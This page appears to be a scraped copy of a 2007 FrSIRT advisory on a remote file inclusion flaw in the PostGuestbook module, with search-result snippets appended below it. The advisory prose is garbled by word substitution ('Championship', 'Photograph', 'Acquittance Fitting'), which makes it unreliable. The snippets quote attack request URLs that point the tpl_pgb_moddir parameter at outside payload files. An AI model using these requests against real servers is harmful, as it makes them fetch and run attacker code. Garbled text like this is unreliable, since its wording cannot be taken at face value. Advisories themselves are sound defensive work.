php   postguestbook   module   http   header 

Header php tpl_pgb_moddir http

Championship : Postguestbook Staff for Postnuke "tpl_pgb_moddir" PHP File Comprehension Photograph
Advisory ID : Frsirt/adv-2007-0880
CVE ID : CVE-2007-1372
Rated as : High-pressure Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Acquittance Fitting : 2007-03-09

Advisory Detail
Brand Forged Products Do
Technical Grade

A photo has archaic identified in Postguestbook (module for Postnuke), which might be exploited by external attackers to extend arbitrary commands. That consequence is due to an stimulation validation erroneousness in the "modules/postguestbook/styles/in ternal/header.php" handwriting this does not demonstrate the "tpl_pgb_moddir" parameter, which power be exploited by external attackers to include malicious PHP scripts and sway arbitrary commands with the privileges of the web server.

Reference

Pic reported by Glod_m

Changelog

2007-03-09 : Initial acquittance

Exposure Pattern

Subscribe to Frsirt VNS and feel real-time e-mail and SMS alerts thereupon new vulnerabilities, exploits, or patches salient to your systems and mesh configurations are available.

Related sites:

Syndic8.com - Feed List
Recent Searches: t646t (0) http:/%2.../feed s/74/13074.xml// modules/postgues tbook/styles/int ernal/header.php ?tpl_pgb_moddir= http://echangeur fr.free.fr/id.tx t??? (2226) http:/%2 ...
www.syndic8.com/ feedlist.php?Ord erBy=lang_code_p rimary&Orde
National Vulnerability Database (CVE-2007-1372)
... vulnerability in styles/internal/ header.php in the PostGuestbook 0.6.1 module for PHP-Nuke allows remote attackers to execute arbitrary PHP code via a URL in the tpl_pgb_moddir ...
nvd.nist.gov/ nvd.cfm?cvename= CVE-2007-1372
Syndic8.com - Feed List
Recent Searches: http:/%2...com/P acificCoastHellw ay//modules/post guestbook/styles /internal/header .php?tpl_pgb_mod dir=http://sulaw esi.us/xpl/load. txt?? (2227) gay (400) http:/%2 ...
www.syndic8.com/ feedlist.php?Sho wTag=Somalia& ;ShowStatus=syn
ISS X-Force Database: postguestbook-he ader-file-includ e(32866 ...
... remote attacker could send a specially-crafte d URL request to the header.php script using the tpl_pgb_moddir ... SourceForge.net, PostGuestbook at http://sourcefor ge.net/projects ...
xforce.iss.net/ xforce/ xfdb/ 32866
www.milw0rm.com
PostGuestbook 0.6.1(tpl_pgb_mo ddir)Remote File Include Expliot # D.Script: http://sourcefor ge.net/projects ... VicTim]/modules/ postguestbook/st yles/internal/he ader.php?tpl_pgb _moddir ...
www.milw0rm.com/ exploits/ download/ 3423
www.open-creatio ns.com
30 //modules/postgu estbook/styles/i nternal/header.p hp?tpl_pgb_moddi r=http://sulawes i.us/xpl/id.txt? ? 30 /demos/openwebst ats//modules/pos tguestbook/style s/internal/heade r.php?tpl_pgb ...
www.open-creatio ns.com/ demos/ openwebstats/ ?type=page
PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability
PostGuestbook 0.6.1(tpl_pgb_mo ddir)Remote File Include Expliot # D.Script: http://sourcefor ge.net/projects ... VicTim]/modules/ postguestbook/st yles/internal/he ader.php?tpl_pgb _moddir ...
www.milw0rm.com/ exploits/ 3423
PostGuestbook Header.PHP Remote File Include Vulnerability
... can use a browser to exploit this issue. The following proof-of-concept URI is available: http://www.examp le.com/modules/p ostguestbook/sty les/internal/hea der.php?tpl_pgb_ moddir=Shell ...
www.securityfocu s.com/ bid/ 22858/ exploit
FrSIRT - PostGuestbook Module for PostNuke "tpl_pgb_mo ddir" PHP File ...
Ce problème résulte d'une erreur d'inclusion présente au niveau du script "modules/po stguestbook/styl es/internal/head er.php" qui ne filtre pas le paramètre "tpl_pgb_mo ddir", ce ...
www.frsirt.com/ bulletins/ 9443
FrSIRT - PostGuestbook Module for PostNuke "tpl_pgb_mo ddir" PHP File ...
... postguestbook modules postguestbook styles internal header.php postguestbook postguestbook postnuke postguestbook risk postguestbook styles internal header.php tpl_pgb_moddir ...
www.frsirt.com/ english/ advisories/ 2007/ 0880

<< Home